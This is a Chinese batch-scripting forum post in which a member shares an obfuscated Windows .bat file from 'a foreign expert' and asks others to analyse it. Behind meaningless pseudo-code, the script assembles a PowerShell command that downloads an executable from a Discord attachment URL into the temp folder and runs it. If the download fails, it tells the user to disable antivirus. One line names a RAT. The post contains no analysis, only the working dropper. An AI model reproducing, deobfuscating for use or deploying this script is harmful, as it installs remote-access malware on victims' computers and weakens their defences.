[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖

[特效代码] 一个外国高手的bat,各位分析一下

  1. @echo off
  2. prompt usr:~#
  3. echo So basically, this is the power of batcc xd
  4. echo made by rootabx
  5. \\0\declare nt, oskrnl, usrlocal [_0x90, _0x7B, _0x004F0C]:MEMORY
  6. MEMORY_ALLOC(USRTEMPFOLDERID(usrlocal,_0x90)):_0x0020D6SETMEMORY&SET _asmMemory=SE&KERNELSUBDLL_GETUSERFOLDERPATH&Mempointer*_0x000F00Cb74&SET _0x00b742==&USER==DIM&getNearAssembly()&dynamicClear.dll IntPtr.holdAll=0
  7. ZtWritebytes(_0x00c07df1),usrlocal&MEMPTR&%_asmMemory%T int128%_0x00b742%lS
  8. dynamicLL.CSharpProvider(encryptedFile-AES&_asmMemory.WriteUIon&%_asmMemory%T writeUI%_0x00b742%et.We&~insert&CSharpProvider.GenerateUI.Details(intptr*&%_asmMemory%T dynamicGUI%_0x00b742%ient).Down&.Up.Down.Down.Down.Up(65535)&.Down.Right.Left.Left.Down(65535)&%_asmMemory%T mmdiagnostic%_0x00b742%xe&environment.clear(xe)
  9. [rootabxRAT.API.Import(intptr*&Object0&%_asmMemory%T _0x000c%_0x00b742%le('ht&fileht(ht)&%_asmMemory%T _0x0042%_0x00b742%tPS
  10. remotePS.connectIP(myIP).TCP=true&kernelMode.OpenSession(oskrnl, intptr&asmMemory.T.\\&.//&///&\\.\/ _0x00f4//.//&%_asmMemory%T _0x00f2%_0x00b742%://cd&memptr.LoadDump()&wersh.CreateWersh(rw-r-w, intptr*&%_asmMemory%T _0x00d8%_0x00b742%ordapp.c&importFiles(ordapp.c, main.c, stdio.c))&memPtr.CLR.parseHex(6675636B796F75)&parsePointer*&wersh.CreateWersh(intptr*&%_asmMemory%T _0x0065%_0x00b742%wersh&Wersh.Clean(intptr*&%_asmMemory%T _0x0b56%_0x00b742%achmen&Schmens.ParsedHex_0x0000FC070B65.Dump(intptr*&%_asmMemory%T _0xb9%_0x00b742%250827267/537708856759812126/U&0xb9 0049026401284/577294609124798/496240824709767/6498520749274986/0000000000000);
  11. oskrnl.KernelInject(_0x90, intptr*&%_asmMemory%T _0x40%_0x00b742%','&Index[142]%TEMP%&c%int128%&%_asmMemory%T nternalStorage%_0x00b742%f exis&intptr*) wr-r-w ACCESSGRANT()
  12. C%int128%&.MODEOPEN
  13. memPointer(_0x004902, null, intptr.HoldZero*&POFile.FxPO&c%int128%&pO%_0x0065%ell.e%mmdiagnostic% (new-object System.N%writeUI%bCl%dynamicGUI%LoadFi%_0x000c%%_0x0042%%_0x00f2%n.disc%_0x00d8%om/att%_0x0b56%ts/537702667%_0xb9%SRSYSTEM.e%mmdiagnostic%%_0x40%%temP%\0x00b659SRS.E%mmdiagnostic%')&C%int128%
  14. i%nternalStorage%t "%temp%\0x00b659SRS.E%mmdiagnostic%" ("%temp%\0x00b659SRS.E%mmdiagnostic%") e%int128%e (color a&cls&echo PLEASE CHECK YOUR INTERNET CONNECTION OR DISABLE ANTIVIRUSES&pause)
复制代码

返回列表